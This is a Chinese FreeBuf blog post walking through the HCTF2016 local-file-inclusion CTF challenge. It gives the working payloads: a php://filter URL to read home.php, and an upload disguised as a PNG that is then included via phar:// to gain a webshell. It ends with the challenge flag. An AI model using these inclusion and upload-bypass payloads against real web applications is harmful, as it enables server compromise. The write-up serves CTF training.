freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

兵者多诡(HCTF2016)
2023-09-04 17:05:58

环境:https://github.com/MartinxMax/CTFer_Zero_one

题目简介

[简介]:在home.php存在一处include函数导致的文件包含漏洞
[难度]:中等
[知识点]:php://协议的Filter利用,通过zip://协议进行文件包含

解题过程

登录首页

图片.png

提交png图片上传抓包,可以看到是向upload文件提交数据

图片.png

图片.png

在fp参数中尝试伪协议读取home.php文件

http://127.0.0.1:88/HCTF2016-LFI/home.php?fp=php://filter/read=convert.base64-encode/resource=home&imagekey=20de480b0e91ea1d67712e491fc2a72b66d782de

包含点后自动被添加了.php,而上传只能是png,那么就利用phar或zip伪协议进行getshell

图片.png

将webshell直接添加压缩包,并且将shell.zip改为shell.png

图片.png

上传图片马,利用phar协议进行文件包含

http://127.0.0.1:88/HCTF2016-LFI/home.php?fp=phar://uploads/25b58d5902e9bb5b9a8569648a86d4dbe9d6d592.png/shell&imagekey=25b58d5902e9bb5b9a8569648a86d4dbe9d6d592

图片.png

上蚁剑,连接webshell

图片.png

Flag

hctf{Th1s_1s_e4sY_1s_n0T_1t?}

# web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录